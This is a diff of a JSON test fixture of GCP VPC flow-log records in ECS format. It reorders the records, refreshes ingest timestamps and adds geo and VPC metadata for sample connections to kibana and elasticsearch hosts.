@@ -15267,9 +16003,39 @@ } }, { + "@timestamp": "2019-06-14T03:50:17.291Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "67.43.156.13", + "10.87.40.76" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } + } + }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -15278,11 +16044,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 53972, 
@@ -15290,6 +16061,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415253704Z", + "original": "{\"insertId\":\"198begsfh44xy3\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53972},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:20.748121914Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:20.634231041Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:44:20.634231041Z", + "end": "2019-06-14T03:44:20.748121914Z", + "id": "198begsfh44xy3", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -15301,17 +16082,22 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", + "192.168.2.117", "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -15326,27 +16112,9 @@ } }, "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } + "reporter": "DEST" } }, - "event": { - "ingested": "2021-12-09T13:37:46.392021100Z", - "original": "{\"insertId\":\"198begsfh44xy3\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53972},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:20.748121914Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:20.634231041Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:44:20.634231041Z", - "end": "2019-06-14T03:44:20.748121914Z", - "id": "198begsfh44xy3", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, 
@@ -15367,6 +16135,16 @@ "ip": "192.168.2.117", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415254093Z", + "original": "{\"insertId\":\"198begsfh44xxt\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":58100},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:20.632737426Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:20.512264850Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:49:20.512264850Z", + "end": "2019-06-14T03:49:20.632737426Z", + "id": "198begsfh44xxt", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -15378,19 +16156,27 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "192.168.2.117", - "10.87.40.76" + "10.87.40.76", + "192.168.2.117" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC" + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -15401,26 +16187,8 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST" } }, - "event": { - "ingested": "2021-12-09T13:37:46.392026700Z", - "original": "{\"insertId\":\"198begsfh44xxt\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":58100},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:20.632737426Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:20.512264850Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:49:20.512264850Z", - "end": "2019-06-14T03:49:20.632737426Z", - "id": "198begsfh44xxt", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { "continent_name": "America", 
@@ -15441,6 +16209,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415254604Z", + "original": "{\"insertId\":\"198begsfh44xy8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":58100,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:20.632777660Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:20.512407536Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:49:20.512407536Z", + "end": "2019-06-14T03:49:20.632777660Z", + "id": "198begsfh44xy8", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -15452,7 +16230,9 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" @@ -15460,12 +16240,18 @@ "related": { "ip": [ "10.87.40.76", - "192.168.2.117" + "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { - "reporter": "SRC" + "reporter": "SRC", + "rtt": { + "ms": 36 + } }, "source": { "vpc": { 
@@ -15480,28 +16266,18 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392032200Z", - "original": "{\"insertId\":\"198begsfh44xy8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":58100,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:20.632777660Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:20.512407536Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:49:20.512407536Z", - "end": "2019-06-14T03:49:20.632777660Z", - "id": "198begsfh44xy8", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 60756, 
@@ -15515,6 +16291,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415255072Z", + "original": "{\"insertId\":\"198begsfh44xy9\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":60756,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:11.032929292Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:10.912193869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:43:10.912193869Z", + "end": "2019-06-14T03:43:11.032929292Z", + "id": "198begsfh44xy9", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -15526,25 +16312,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "67.43.156.14" + "67.43.156.14", + "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -15555,23 +16340,11 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST" } }, - "event": { - "ingested": "2021-12-09T13:37:46.392036900Z", - "original": "{\"insertId\":\"198begsfh44xy9\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":60756,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:11.032929292Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:10.912193869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:43:10.912193869Z", - "end": "2019-06-14T03:43:11.032929292Z", - "id": "198begsfh44xy9", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 22, @@ -15581,12 +16354,15 @@ "source": { "geo": { "continent_name": "Asia", - "country_name": "chn", - "city_name": "Shangqiu", - "region_name": "Henan" + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 4837 + "number": 35908 }, "address": "67.43.156.14", "port": 14236, 
@@ -15594,6 +16370,16 @@ "ip": "67.43.156.14", "packets": 3 }, + "event": { + "ingested": "2021-12-14T14:43:27.415255548Z", + "original": "{\"insertId\":\"198begsfh44xxr\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":14236},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:12.064908439Z\",\"packets_sent\":\"3\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"start_time\":\"2019-06-14T03:40:08.247072525Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:08.247072525Z", + "end": "2019-06-14T03:40:12.064908439Z", + "id": "198begsfh44xxr", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -15605,19 +16391,30 @@ "iana_number": "6", "packets": 3, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.14", - "10.139.99.242" + "10.87.40.76", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -15628,33 +16425,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST" } }, - "event": { - "ingested": "2021-12-09T13:37:46.392040400Z", - "original": "{\"insertId\":\"198begsfh44xxr\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":14236},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:12.064908439Z\",\"packets_sent\":\"3\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"start_time\":\"2019-06-14T03:40:08.247072525Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:08.247072525Z", - "end": "2019-06-14T03:40:12.064908439Z", - "id": "198begsfh44xxr", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 60122, 
@@ -15668,6 +16452,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415256047Z", + "original": "{\"insertId\":\"198begsfh44xy2\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":60122,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:39.207635184Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:39.087226326Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:41:39.087226326Z", + "end": "2019-06-14T03:41:39.207635184Z", + "id": "198begsfh44xy2", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -15679,7 +16473,9 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" @@ -15690,6 +16486,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -15710,28 +16509,18 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392044800Z", - "original": "{\"insertId\":\"198begsfh44xy2\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":60122,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:39.207635184Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:39.087226326Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:41:39.087226326Z", - "end": "2019-06-14T03:41:39.207635184Z", - "id": "198begsfh44xy2", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 53972, 
@@ -15745,6 +16534,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415256480Z", + "original": "{\"insertId\":\"198begsfh44xy6\",\"jsonPayload\":{\"bytes_sent\":\"1782\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53972,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:20.748121914Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:20.634231041Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:44:20.634231041Z", + "end": "2019-06-14T03:44:20.748121914Z", + "id": "198begsfh44xy6", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -15756,65 +16555,30 @@ "iana_number": "6", "packets": 7, "direction": "outbound" + } + }, + { + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, - "@timestamp": "2019-06-14T03:50:17.291Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.87.40.76", - "67.43.156.13" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.392049Z", - "original": "{\"insertId\":\"198begsfh44xy6\",\"jsonPayload\":{\"bytes_sent\":\"1782\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53972,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:20.748121914Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:20.634231041Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:44:20.634231041Z", - "end": "2019-06-14T03:44:20.748121914Z", - "id": "198begsfh44xy6", - "category": "network", - "type": "connection" - } - }, - { - "log": { - 
"logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.139.99.242", - "port": 9200, - "domain": "elasticsearch", - "ip": "10.139.99.242" + "destination": { + "address": "10.139.99.242", + "port": 9200, + "domain": "elasticsearch", + "ip": "10.139.99.242" }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33530, 
